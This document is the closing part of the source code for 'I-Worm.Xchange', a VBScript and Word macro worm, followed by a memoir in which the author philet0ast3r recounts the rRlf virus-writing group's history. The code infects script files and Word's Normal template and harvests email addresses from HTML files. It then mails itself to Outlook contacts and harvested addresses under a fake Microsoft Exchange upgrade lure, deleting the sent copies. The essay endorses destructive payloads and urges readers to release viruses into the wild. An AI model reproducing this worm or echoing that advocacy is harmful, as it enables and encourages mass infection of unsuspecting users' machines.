sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""
For i=1 To len(virus)
  e=Mid(virus,i,1)
  e=Hex(Asc(e))
  If Len(e)=1 Then
    e="0"&e
  End If
  f=f+e
  If Len(f)=110 Then
    sp.WriteLine "e = e + """+f+""""
    f=""
  End If
  If Len(virus)-i = 0 Then
    sp.WriteLine "e = e + """+f+""""
    f=""
  End If
Next
sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\xchange.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\xchange.vbs"""
sp.WriteLine "Call infect_fichier"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub HelpAbout()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""I-Worm.Xchange"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub AutoClose()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "FileSystem.Kill ""C:\xchange.vbs"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub infect_fichier()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents"
sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents"
sp.WriteLine "df = ""C:\XChange.vba"""
sp.WriteLine "If nor.Item(""Xchange"").Name <> ""Xchange"" Then"
sp.WriteLine " doc(""Xchange"").Export df"
sp.WriteLine " nor.Import df"
sp.WriteLine "End If"
sp.WriteLine "If doc.Item(""Xchange"").Name <> ""Xchange"" Then"
sp.WriteLine " nor(""Xchange"").Export df"
sp.WriteLine " doc.Import df"
sp.WriteLine " ActiveDocument.Save"
sp.WriteLine "End If"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close

infvbs(win)
infvbs(fso.GetSpecialFolder(1))
SendWithOutlook()

Set wd=CreateObject("Word.Application")
If ws.RegRead ("HKLM\Software\Microsoft\MsXchange") <> "Coded by PetiK (c)2002" then
  CN = CreateObject("WScript.NetWork").ComputerName
  Set srch=wd.Application.FileSearch
  srch.Lookin = "C:\": srch.SearchSubFolders = True: srch.FileName="*.doc;*.dot": srch.Execute
  Set sp=fso.OpenTextFile(fcopy,8)
  sp.WriteLine "'On "&date& " at "&time&" from "&CN
  sp.WriteLine "'Number of DOC and DOT file found : "& srch.FoundFiles.Count
  sp.WriteBlankLines(1)
  sp.Close
  ws.RegWrite "HKLM\Software\Microsoft\MsXchange","Coded by PetiK (c)2002"
End If

Set vba=wd.NormalTemplate.VBProject.VBComponents
If vba.Item("Xchange").Name <> "Xchange" Then
  vba.Import "C:\XChange.vba"
  wd.Application.NormalTemplate.Save
End If
wd.Application.NormalTemplate.Close
wd.Application.Quit

Set mel=fso.CreateTextFile(win&"\kitep.wab.txt",8,TRUE)
counter=0
lect()
mel.WriteLine "#"
mel.Close
WScript.Quit

Sub lect()
  On Error Resume Next
  Set dr=fso.Drives
  For Each d in dr
    If d.DriveType=2 or d.DriveType=3 Then
      list(d.path&"\")
    End If
  Next
End Sub

Sub spreadmailto(dir)
  On Error Resume Next
  Set fso=CreateObject("Scripting.FileSystemObject")
  Set f=fso.GetFolder(dir)
  Set cf=f.Files
  For Each fil in cf
    ext=fso.GetExtensionName(fil.path)
    ext=lcase(ext)
    if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
      set htm=fso.OpenTextFile(fil.path,1)
      verif=True
      allhtm=htm.ReadAll()
      htm.Close
      For ml=1 To Len(allhtm)
        count=0
        If Mid(allhtm,ml,7) = "mailto:" Then
          counter=counter+1
          mlto=""
          Do While Mid(allhtm,ml+6+count,1) <> """"
            count=count+1
            mlto = mlto + Mid(allhtm,ml+6+count,1)
          loop
          mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"
          sendmailto(left(mlto,len(mlto)-1))
        End If
      Next
    End If
  Next
End Sub

Sub list(dir)
  On Error Resume Next
  Set f=fso.GetFolder(dir)
  Set ssf=f.SubFolders
  For Each fil in ssf
    spreadmailto(fil.path)
    list(fil.path)
  Next
End Sub

Sub sendmailto(email)
  Set out=CreateObject("Outlook.Application")
  Set mailmelto=out.CreateItem(0)
  mailmelto.To email
  mailmelto.Subject "Upgrade Ms Exchange"
  mailmelto.Body "Run this attached file to upgrade Ms Exchange"
  mailmelto.Attachment.Add (WScript.ScriptFullName)
  mailmelto.DeleteAfterSubmit = True
  mailmelto.Send
  Set out = Nothing
End Sub

Sub SendWithOutlook()
  Set A=CreateObject("Outlook.Application")
  Set B=A.GetNameSpace("MAPI")
  For Each C In B.AddressLists
    If C.AddressEntries.Count <> 0 Then
      For D=1 To C.AddressEntries.count
        Set E=C.AddressEntries(D)
        Set F=A.CreateItem(0)
        F.To=E.Address
        F.Subject="Update and upgrade MS Exchange."
        F.Body="run this attached file to update Ms Exchange. See you soon."
        Set G=CreateObject("Scripting.FileSystemObject")
        F.Attachments.Add(fcopy)
        F.DeleteAfterSubmit=True
        If F.To <> "" Then
          F.Send
        End If
      Next
    End If
  Next
End Sub

Function infvbs(Folder)
  If f.FolderExists(Folder) then
    For each P in f.GetFolder(Folder).Files
      ext=f.GetExtensionName(P.Name)
      If ext="vbs" or ext="vbe" Then
        Set VF=f.OpenTextFile(P.path, 1)
        mark=VF.Read(14)
        VF.Close
        If mark <> "'VBS.Xchange.A" Then
          Set VF=f.OpenTextFile(P.path, 1)
          VC=VF.ReadAll
          VF.Close
          VCd=virus & VC
          Set VF=f.OpenTextFile(P.path,2,True)
          VF.Write VCd
          VF.Close
        End If
      End If
    Next
  End If
End Function

articles

Full Disclosure philet0ast3r

Full Disclosure
a self-reflection of my time with the rRlf and the virus scene
by philet0ast3r

Hi, my name is Stefan, I'm (nearly) 26 years old and live in a not too small but not really big city in Bavaria, Germany. I work as a care specialist at a home for mentally heavy handicapped people. That job is strenuous and you need lots of patience for it, but it's also lots of fun. Which to some part depends on my great colleagues, who are mostly nice girls around my age (hi Verena, hi Claudia :). In my spare time I love to meet people, listen to music (crust and d-beat), watch movies, play with my pc, go snowboarding, do any kind of stupid bullshit, cause I'm an adrenalin-junkie, get drunk or stoned.

The above picture is me from some time ago. But I look quite the same right now. Just got a different haircut. Haircuts never last long with me, and I like the above picture, so I didn't put one from at the moment.

Most of you probably know me better under the name philet0ast3r (or short: philie), I am one of the three founders of the Ready Rangers Liberation Front, and the last active one to close it now, that's why we are here. This article is a self-reflection for me of what happened over the years from beginning to the end. Eight years is a long time. I thought it may interest some people to know some backgrounds, so I decided to write it all down.

But now let's get back in time to the proclaimed end of the world. Do you remember new years eve 2000? I hate new years eve parties, they are shit most of the time. 2000 was the worst till now. Then, half a year after the apocalypse I still found myself hanging around in this lameass boring Bavarian province town called Hirschau. If there would not have been just the right bunch of people at the right time, I would have probably ended up as a farmer that spends all his money on VW-tuning. But thanks to the Goddess there were those people.
No one of us had a car, so we most of the time had to hang around in our town. Skating, drinking beer and smoking weed all day long. There's one cool thing in Hirschau, that's Monte Kaolino, a gigantic mountain of white sand. I think the biggest sand-mountain in Europe. Every year there's Sandboard WM there.

So one fine Friday afternoon, the 21st of July 2000, we were sitting around in front of a Netto supermarket, where we used to skate. Me and my friends Sebi (dr.g0nZo or dg0) and Crazy Phil (El DudErin0 or eeo) had some experience with lame keyloggers, sub7 and back orifice, which were trendy at that time. So sitting there at the 90% empty parking spaces in front of a supermarket, we thought we could waste some time by founding a cool computer-underground-hacker-group. Ok, done.

Now we needed a name for that group. At that time we were all fascinated by discordianism, a parody-religion that gives some good non-parody-stuff for thinking about religion and life (search for Principia Discordia, if you are interested). There was a discordian group called ELF: Erisian Liberation Front. We liked that and took over the Liberation Front. eeo had an alien workshop skateboard deck at that time: So that's where the Ready Rangers comes from.

I remember I got home in the evening, and started to work on a logo and a homepage. We were meeting up again later to drink some beer, and me and eeo both finished a logo. That was mine: But it was too big and crappy, so we took eeo's for the page: Our first homepage was located at readyrangers.tsx.org. On it was some info about us, a guestbook, some pictures and I don't know really. We were nothing about viruses in the beginning, just some "here we are, and this is our bullshit".

About that time, I made my first contact with a computer virus. It was an mbr-infector that killed my partition table in the end. The second one came shortly after: Good ol Parity.Boot.B.
These things somehow caught my mind and I wanted to know how to do something like that, so I searched around the net and finally found an asm-vck. I played around with it and tried to learn from the code, but asm was too complicated at the beginning (also later: I retried learning asm, but was way too lazy. The little things I can do in asm suck big time). Some time later I stumbled over a batch vck, I think it was from Wavefunc. I began to experiment around with batch and after a while wrote my first virus, called hAwasupaAE, together with dg0. Or better: Ant!logic, that was his nick at that time. He changed it to 7r!NT after a short time, but after we found out that trint was the name of a plane engine, we always made fun of him (trint the drunken engine, or something like that). So he changed it again to dr.g0nZo (that's the fake name of Oscar Zeta Acosta in Hunter S. Thompson's Fear and Loathing in Las Vegas ... btw: El DudErin0 comes from The Big Lebowski). My nick at that time was sicBrain, which now really sucks, so I changed it to philet0ast3r (someone who toasts files ;) after a while. I stuck with that nick and still use it (or its short form philie) for nearly everything.

Now where was I? hAwasupaAE. It's also included in this zine. Our page readyrangers.tsx.org went down for some reason, so we made up our new home at readyrangers.de.vu (which still works, check it out). Now expanding our stuff to our first batch-virus tries and photoshop-pictures we called psychedelic art. Responsible for the last was mostly rastafarie, who was also from Hirschau. Other members at the beginning were pRe4Ch_0_23 from Hirschau, and TeAgeCe, rastafarie's cousin. Both were kicked after a short while for like doing nothing at all, while I improved my e-mail- and web-account hacking skills. Which nearly brought me into lots of trouble, so I decided to get some distance and concentrate more on batch and virus writing.
Btw hacking: We had this hacking contest on our page in the early days called D33p Ph0rest. That's from the original page:

Here you can register for the D33p Ph0rest Hacking-Contest. It is split in 10 phases. If you ended one phase with success you get access to a higher phase. In every phase you have to solve tasks, which have something to do with a certain topic (guess what ;)). Those tasks get more difficult from time to time. You can win: E-mail address with @rRlf.de, a guest-account (www.rRlf.de/your_name), or you can become a rRlf-member. [some registering field] You will get a mail with the first task. You really don't need much knowledge for the beginning, D33p Ph0rest is for you to learn how such things work. Joining is also interesting for 31337-h4xX0r-d00dz, because it gets really difficult in higher phases. If someone needs a hint, he can write to philet0ast3r. He will get the hint (we want to learn something, don't we?).

You had to manage different things like account hacking, some cracking, social engineering, and stuff like that, which was really easy in the first "phases", but got quite hard later. Unfortunately I lost all the tasks. There were only two people who got through all 10 phases: 7r1NT (aka dg0) and mirdochwurscht (aka pRe4Ch_0_23). The last one with fuckin lots of help and hints... The thing was funny somehow. You can watch the old ranks (or "Hall 0f Phame", how we called it) here: web.archive.org/web/20020127021457/www.rrlf.de/hall0fphame.html

I think it was the annoying ads that brought us to get our own domain. The infamous rRlf.de. I recently found this picture, which was on the page while I was still working on it: End of March 2001 the page was finally ready, it lost its absolutely-script-kiddie style and got a bit more serious. That page style lasted all the years, just the colors changed from time to time.
Around that time I made contacts here and there in the virus scene, found more and more virus groups, discovered #virus and #vxers on undernet.irc (kixorball was great, does that still exist?), met and learned to know lots of virus coders there, read myself through lots of old virus zines. One of the people I knew at that time was Zoom23, who was the editor of Pinoy Virus Writers Zine (which was *very* lame the first few issues). I showed him my virus "BlackDay phinal" and he said he wanted to take it for pvw#6. Wow, that was a cool moment. Like the first time sex. Now I was a pro-virus-coder whose stuff gets released in zines. W00t.

In July 2001 Necronomikon joined the rRlf, but left it again after not even two weeks (on our first birthday!). He said it was because of exams, but I don't believe him. I think more it was because we had a bad reputation in the virus scene at that time. Well, bad reputation is the wrong term. People were calling us lamers because we were doing only batch stuff. We were no lamers but beginners.

Since I know the virus scene, some people who consider themselves being part of it say "the virus scene dies". From 2000 to 2008. A long death. But from their point of view it of course dies, because old pros quit, and new beginners are lamers. I don't get why being new is lame. It's kinda like that in every computer-subculture. Too many people with that opinion. Just Bullshit. Like they were born pros. rRlf was always a platform for beginner virus writers, we had just a few members who made themselves a name in the virus scene before entering rRlf. And now look where it brought us. And where are those assholes doing nothing but hanging around in irc and calling other people lamers? Long forgotten.

But no blame on Necronomikon. I don't know him very well, but also we never really lost contact. He's a nice guy for sure and he always contributed some stuff to our zines, also to this last one.
A month later Jimmy joined the rRlf, who later changed his name to Energy. I don't know really much about this guy, he was kinda strange.

One more month later I joined SallyOne Group, so I was now in two groups. Does anyone remember SallyOne? That was a huge archive for anything virus related. Like VX Heavens or VX Chaos. I knew BTK, the owner of SallyOne. He invited me to join his new group, as he wanted to not just put stuff for download, but also release its own zine. So he needed people for his crew. Soon after that SallyOne was kicked by its isp and disappeared, just the group remained, which was hosted now on rRlf.de. We were working on SallyOne Group #1 for a while.

Meanwhile the rRlf got a new member: luN4, who later changed her name to disk0rdia. She was doing mainly poems (kinda stupid if I read them now) and later photos. A very nice girl from the city where I live now. I know her well since that time, and we are still friends today (my bat.kia is dedicated to her). Btw: I think we were the only virus group with also members that don't code but do any kind of other art, like pictures, short stories or poems. And I noticed some influence. Other groups also started to put some pictures and artworks in their zines. Keep that up guys, it's great!

Now 2002, we were still working on stuff for SallyOne Group #1 as BTK, after the loss of his online virus archive, decided to quit. The group lost its leader and broke apart. Man, the group page had this fantastic Matrix like looking ball to scroll around as menu... Amazing. The only guy I kept contact with from SallyOne Group afterwards was ToxiC. We also hosted his page for a while.

I was so looking forward to the SallyOne Group zine, that with it not coming out, we thought: Fuck it, if you wanna do it right, you gotta do it yourself. So we decided to bring out our own zine. It already came out one month later. Shortly before the release Energy left the rRlf, don't really know why.
For being in the same group we really had too little contact. But a week later ppacket joined the rRlf. I knew him from Pinoy Virus Writers. And I'm not sure, maybe he was also a member of SallyOne Group. Anyways: rRlf#1 was great! Ok, ok, it sucks :) But it was great at that time, and it was a great step forward for the group. "When the going gets weird the weird turn pro" ... our turn. What I liked very much in the first issues of rRlf zine was that they were made up like a real magazine. Not just "virus section", "tutorial section", "tools section", click on what you want, but you could kind of turn the pages like, yeah, a real magazine. There was code, turn the page: a tutorial, turn the page: code, turn the page: an artwork to chill between the codes. There's a very low quality picture in rRlf#1 called RRLF2 by El DudErin0: This picture was made by a machine in a big shopping center. You could stand before it, get photographed and mail the picture away. On it are from left to right: rastafarie, eeo and me. Also in rRlf#1 is a shitty article by me called "The Virus Scene today". But there's one hot topic in it I want to comment on. Or maybe two. Destructive payloads and putting viruses in the wild. I still got the same opinion as expressed in the article from six years ago. I'm not against destructive payloads. In a way I think they are even good. Good if you want to transport a (maybe political) message with your virus. The pathetic human of today tends to only listen if you slap him in the face first. That's also the reason why going to a peaceful demonstration will never change anything. Riots do. As my father used to say: "First there has to happen something, before something happens." Violence can not be rejected completely, it just may not be used senselessly and without purpose. So I think, destructive payloads for viruses are ok, if you use them wisely. Second: We are virus and worm writers. 
It is a virus, when it infects other files, a worm, when it spreads by itself. Anyway, the purpose of both is reproduction. It's in their nature. Don't be a bad creator and keep your creations from their natural destiny. Spread your viruses people! Put them in the wild! Infect everything whenever you can! It's ok to say officially you are against spreading, I did, but I think about 50% of the people I know are liars if it comes to this ;) If you got a different opinion ok, but don't hate people who spread viruses, it might be also the one you chat with, or the one in your group. Where do you think all those widespread viruses come from? Single coders no one knows?